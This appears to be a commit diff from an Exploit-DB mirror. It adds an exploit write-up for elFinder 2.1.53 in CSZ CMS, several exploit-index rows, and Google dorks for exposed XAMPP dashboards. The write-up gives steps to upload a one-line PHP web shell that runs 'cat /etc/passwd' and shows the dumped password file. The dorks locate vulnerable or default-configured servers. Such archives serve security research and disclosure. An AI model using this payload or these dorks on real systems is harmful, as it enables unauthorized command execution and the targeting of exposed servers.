# Exploit Author: tmrswrr
|
||||
# Google Dork: intitle:"elFinder 2.1.53"
|
||||
# Vendor Homepage: https://studio-42.github.io/elFinder/
|
||||
# Software Link: https://github.com/Studio-42/elFinder/archive/refs/tags/2.1.53.zip
|
||||
# Version: 2.1.53
|
||||
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS
|
||||
|
||||
1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/admin/filemanager
|
||||
2 ) Click Template Main and upload this test.php file :
|
||||
|
||||
<?php echo system('cat /etc/passwd'); ?>
|
||||
|
||||
3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.php
|
||||
|
||||
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
|
|
@ -4443,6 +4443,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
45240,exploits/hardware/webapps/45240.txt,"Geutebrueck re_porter 7.8.974.20 - Credential Disclosure",2018-08-22,"Kamil Suska",webapps,hardware,,2018-08-22,2018-08-22,0,CVE-2018-15534,,,,,
|
||||
46179,exploits/hardware/webapps/46179.txt,"GL-AR300M-Lite 2.27 - (Authenticated) Command Injection / Arbitrary File Download / Directory Traversal",2019-01-16,"Pasquale Turi",webapps,hardware,80,2019-01-16,2019-03-17,0,CVE-2019-6275;CVE-2019-6274;CVE-2019-6273;CVE-2019-6272,"Command Injection",,,http://www.exploit-db.comlede-ar300m-2.27.bin,
|
||||
46179,exploits/hardware/webapps/46179.txt,"GL-AR300M-Lite 2.27 - (Authenticated) Command Injection / Arbitrary File Download / Directory Traversal",2019-01-16,"Pasquale Turi",webapps,hardware,80,2019-01-16,2019-03-17,0,CVE-2019-6275;CVE-2019-6274;CVE-2019-6273;CVE-2019-6272,Traversal,,,http://www.exploit-db.comlede-ar300m-2.27.bin,
|
||||
51865,exploits/hardware/webapps/51865.py,"GLiNet - Router Authentication Bypass",2024-03-06,"Daniele Linguaglossa",webapps,hardware,,2024-03-06,2024-03-06,0,,,,,,
|
||||
28555,exploits/hardware/webapps/28555.txt,"Good for Enterprise 2.2.2.1611 - Cross-Site Scripting",2013-09-25,Mario,webapps,hardware,,2013-09-25,2013-09-25,0,CVE-2013-5118;OSVDB-97664,,,,,
|
||||
16907,exploits/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,webapps,hardware,,2010-07-01,2011-03-06,1,CVE-2005-3757;OSVDB-20981,"Metasploit Framework (MSF)",,,,
|
||||
38073,exploits/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - Cross-Site Request Forgery / Command Execution",2015-09-02,"Phan Thanh Duy",webapps,hardware,80,2015-09-02,2015-09-02,0,OSVDB-127012,,,,,
|
||||
|
@ -16513,6 +16514,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
50899,exploits/php/webapps/50899.txt,"CSZ CMS 1.3.0 - 'Multiple' Blind SQLi",2022-05-11,"Dogukan Dincer",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
|
||||
51703,exploits/php/webapps/51703.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
|
||||
51704,exploits/php/webapps/51704.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
|
||||
51863,exploits/php/webapps/51863.py,"CSZ CMS Version 1.3.0 - Authenticated Remote Command Execution",2024-03-06,tmrswrr,webapps,php,,2024-03-06,2024-03-06,0,,,,,,
|
||||
31517,exploits/php/webapps/31517.txt,"CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",webapps,php,80,2014-02-07,2014-02-07,0,CVE-2013-2639;OSVDB-103117,,,,,
|
||||
11063,exploits/php/webapps/11063.txt,"CU Village CMS Site 1.0 - 'print_view' Blind SQL Injection",2010-01-08,Red-D3v1L,webapps,php,,2010-01-07,,1,,,,,,
|
||||
11495,exploits/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-17,,1,,,,,,
|
||||
|
@ -16623,6 +16625,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
27676,exploits/php/webapps/27676.txt,"CutePHP CuteNews 1.4.1 Editnews Module - Cross-Site Scripting",2006-04-19,LoK-Crew,webapps,php,,2006-04-19,2013-08-18,1,CVE-2006-1925;OSVDB-25236,,,,,https://www.securityfocus.com/bid/17592/info
|
||||
34096,exploits/php/webapps/34096.txt,"CuteSITE CMS 1.x - '/manage/add_user.php?user_id' SQL Injection",2010-06-06,"High-Tech Bridge SA",webapps,php,,2010-06-06,2014-07-17,1,CVE-2010-5024;OSVDB-65454,,,,,https://www.securityfocus.com/bid/40612/info
|
||||
34097,exploits/php/webapps/34097.txt,"CuteSITE CMS 1.x - '/manage/main.php?fld_path' Cross-Site Scripting",2010-06-06,"High-Tech Bridge SA",webapps,php,,2010-06-06,2014-07-17,1,CVE-2010-5025;OSVDB-65453,,,,,https://www.securityfocus.com/bid/40612/info
|
||||
51862,exploits/php/webapps/51862.txt,"CVE-2023-50071 - Multiple SQL Injection",2024-03-06,"Geraldo Alcantara",webapps,php,,2024-03-06,2024-03-06,0,,,,,,
|
||||
3628,exploits/php/webapps/3628.txt,"CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion",2007-04-01,GoLd_M,webapps,php,,2007-03-31,2016-09-30,1,OSVDB-35228;CVE-2007-1809;OSVDB-35227;OSVDB-35226,,,,http://www.exploit-db.com373_cwbs1.5_demo.zip,
|
||||
2151,exploits/php/webapps/2151.txt,"Cwfm 0.9.1 - 'Language' Remote File Inclusion",2006-08-08,"Philipp Niedziela",webapps,php,80,2006-08-07,2016-09-01,1,OSVDB-27857;CVE-2006-4077,,,,http://www.exploit-db.comCwfm-0.9.1.tar.gz,
|
||||
2960,exploits/php/webapps/2960.pl,"cwmCounter 5.1.1 - 'statistic.php' Remote File Inclusion",2006-12-19,bd0rk,webapps,php,,2006-12-18,,1,OSVDB-32383;CVE-2006-6738,,,,,
|
||||
|
@ -17843,6 +17846,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
25951,exploits/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injections",2005-07-07,"Diabolic Crab",webapps,php,,2005-07-07,2013-06-05,1,,,,,,https://www.securityfocus.com/bid/14180/info
|
||||
36925,exploits/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",webapps,php,,2015-05-08,2015-05-08,0,OSVDB-121835,,,,http://www.exploit-db.comelFinder-2.0-rc1.tar.gz,
|
||||
46481,exploits/php/webapps/46481.py,"elFinder 2.1.47 - 'PHP connector' Command Injection",2019-03-04,q3rv0,webapps,php,80,2019-03-04,2019-03-13,1,CVE-2019-9194,"Command Injection",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/
|
||||
51864,exploits/php/webapps/51864.txt,"elFinder Web file manager Version - 2.1.53 Remote Command Execution",2024-03-06,tmrswrr,webapps,php,,2024-03-06,2024-03-06,0,,,,,,
|
||||
8993,exploits/php/webapps/8993.txt,"elgg - Cross-Site Scripting / Cross-Site Request Forgery / Change Password",2009-06-22,lorddemon,webapps,php,,2009-06-21,,1,,,,,,
|
||||
9355,exploits/php/webapps/9355.txt,"elgg 1.5 - '/_css/js.php' Local File Inclusion",2009-08-04,eLwaux,webapps,php,,2009-08-03,,1,OSVDB-56760;CVE-2009-3149,,,,,
|
||||
17685,exploits/php/webapps/17685.txt,"Elgg 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",webapps,php,,2011-08-18,2011-08-18,1,,,,,http://www.exploit-db.comelgg-1.7.10.zip,
|
||||
|
@ -22730,6 +22734,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
7896,exploits/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,webapps,php,,2009-01-27,,1,,,,,,
|
||||
51795,exploits/php/webapps/51795.py,"Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over",2024-02-13,Or4nG.M4N,webapps,php,,2024-02-13,2024-02-13,0,,,,,,
|
||||
51570,exploits/php/webapps/51570.py,"Lost and Found Information System v1.0 - SQL Injection",2023-07-06,"Amirhossein Bahramizadeh",webapps,php,,2023-07-06,2023-07-06,0,CVE-2023-33592,,,,,
|
||||
51861,exploits/php/webapps/51861.txt,"Lot Reservation Management System - Unauthenticated File Disclosure",2024-03-06,"Elijah Mandila Syoyi",webapps,php,,2024-03-06,2024-03-06,0,,,,,,
|
||||
51860,exploits/php/webapps/51860.txt,"Lot Reservation Management System - Unauthenticated File Upload and Remote Code Execution",2024-03-06,"Elijah Mandila Syoyi",webapps,php,,2024-03-06,2024-03-06,0,,,,,,
|
||||
48934,exploits/php/webapps/48934.txt,"Lot Reservation Management System 1.0 - Authentication Bypass",2020-10-23,"Ankita Pal",webapps,php,,2020-10-23,2020-11-05,1,,,,,,
|
||||
48935,exploits/php/webapps/48935.txt,"Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)",2020-10-23,"Ankita Pal",webapps,php,,2020-10-23,2020-10-23,0,,,,,,
|
||||
4710,exploits/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection",2007-12-10,"Aria-Security Team",webapps,php,,2007-12-09,,1,OSVDB-52880;OSVDB-52879;OSVDB-52877,,,,,
|
||||
|
|
Can't render this file because it is too large.
|
23
ghdb.xml
23
ghdb.xml
|
@ -116675,6 +116675,29 @@ Author: Teague Newman</textualDescription>
|
|||
<date>2004-03-04</date>
|
||||
<author>anonymous</author>
|
||||
</entry>
|
||||
<entry>
|
||||
<id>8421</id>
|
||||
<link>https://www.exploit-db.com/ghdb/8421</link>
|
||||
<category>Vulnerable Servers</category>
|
||||
<shortDescription>Google Dorks for Default XAMPP Dashboards</shortDescription>
|
||||
<textualDescription>Exploit Title:XAMPP Default Dashboard Panels
|
||||
|
||||
Google Dork:
|
||||
intext:"Welcome to XAMPP for *" intitle:"Welcome to XAMPP" inurl:/dashboard
|
||||
|
||||
intext:apache + mariadb + php + perl intext:"welcome to xampp for *"
|
||||
intitle:"welcome to xampp"
|
||||
|
||||
Date: 06/03/2024
|
||||
|
||||
Exploit Author: Gurudatt Choudhary
|
||||
</textualDescription>
|
||||
<query>Google Dorks for Default XAMPP Dashboards</query>
|
||||
<querystring>https://www.google.com/search?q=Google Dorks for Default XAMPP Dashboards</querystring>
|
||||
<edb></edb>
|
||||
<date>2024-03-06</date>
|
||||
<author>Gurudatt Choudhary</author>
|
||||
</entry>
|
||||
<entry>
|
||||
<id>46</id>
|
||||
<link>https://www.exploit-db.com/ghdb/46</link>
|
||||
|
|
Loading…
Add table
Reference in a new issue